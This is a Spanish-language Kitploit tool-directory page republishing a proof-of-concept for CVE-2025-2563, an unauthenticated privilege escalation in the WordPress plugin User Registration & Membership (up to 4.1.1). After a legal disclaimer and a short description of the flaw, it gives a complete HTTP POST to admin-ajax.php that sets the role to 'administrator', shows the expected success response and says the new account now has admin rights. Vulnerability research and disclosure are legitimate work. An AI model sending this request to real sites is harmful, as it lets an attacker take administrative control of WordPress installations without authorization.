Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-2563 — CVE-2025-2563 PoC | Kitploit
Herramientas/GitHubGitHub/ubaydev/cve-2025-2563
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHububaydev/cve-2025-2563

CVE-2025-2563

CVE-2025-2563 PoC

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-2563

User Registration & Membership <= 4.1.1 - Escalada de privilegios no autenticada

¡Aviso legal!

La información presentada en este informe de CVE (Common Vulnerabilities and Exposures) tiene fines exclusivamente educativos e informativos. Los detalles proporcionados se basan en recursos disponibles públicamente, investigaciones y análisis realizados por el autor. El contenido no pretende promover ni fomentar actividades ilegales, incluida la piratería informática, la explotación o el acceso no autorizado a sistemas.

El autor no asume ninguna responsabilidad por el mal uso de la información presentada. Se recomienda que las personas y organizaciones apliquen este conocimiento de manera responsable y conforme a las leyes y regulaciones aplicables. Se recomienda encarecidamente a los lectores que prueben las vulnerabilidades únicamente en entornos controlados y con la debida autorización.

El autor y los colaboradores de este informe no respaldan ni apoyan actividades maliciosas y fomentan la divulgación responsable y las prácticas éticas de hacking.


Descripción

Se ha descubierto una vulnerabilidad de seguridad crítica en el plugin de WordPress "User Registration & Membership", una herramienta popular para crear sitios de membresía y formularios de registro. La falla, identificada como CVE-2025-2563, tiene una puntuación CVSS de 9.8, lo que indica su alta severidad.

El plugin User Registration & Membership para WordPress es vulnerable a la escalada de privilegios en versiones hasta la 4.1.1 inclusive. Esto se debe a restricciones insuficientes en el tipo de rol en la función 'prepare_members_data()'. Esto permite que atacantes no autenticados creen nuevas cuentas de usuario con el rol de 'administrator', bajo estas condiciones:

  1. El complemento de membresía está activado
  2. El usuario registrado no necesita confirmación

PoC (Prueba de Concepto)

  1. Regístrese a través de la página frontal en /registration o /membership-registration
  2. Después de registrarse, utilice estos datos de solicitud.
    root@kitploit:~
    POST /wp-admin/admin-ajax.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
    Accept: */*
    Host: hackthebox.test
    Accept-Encoding: gzip, deflate, br
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=--------------------------189123966817005614765335
    
    ----------------------------189123966817005614765335
    Content-Disposition: form-data; name="action"
    
    user_registration_membership_register_member
    ----------------------------189123966817005614765335
    Content-Disposition: form-data; name="security"
    
    THE_NONCE_HERE
    ----------------------------189123966817005614765335
    Content-Disposition: form-data; name="members_data"
    
    {"membership":"MEMBERSHIP_ID","payment_method":"free","start_date":"2025-3-29","username":"REGISTERED_USERNAME","role":"administrator"}
    ----------------------------189123966817005614765335--
    
  3. La respuesta debe ser similar a esta
    root@kitploit:~
    {
        "success": true,
        "data": {
            "member_id": 24,
            "transaction_id": "",
            "message": "New member has been successfully created."
        }
    }  
    
  4. Ahora puede iniciar sesión en la cuenta registrada con privilegios de administrador.

Referencia

  1. https://plugins.trac.wordpress.org/browser/user-registration/tags/4.1.2/modules/membership/includes/Admin/Services/MembersService.php?rev=3259656#L106
  2. https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-411-unauthenticated-privilege-escalation
  3. https://securityonline.info/wordpress-plugin-cve-2025-2563-scores-9-8-threatens-thousands-of-membership-sites/

Agradecimientos

  • https://saweria.co/ubaii
  • https://buymeacoffee.com/ubaii
  • https://trakteer.id/ubaii
Descargar herramienta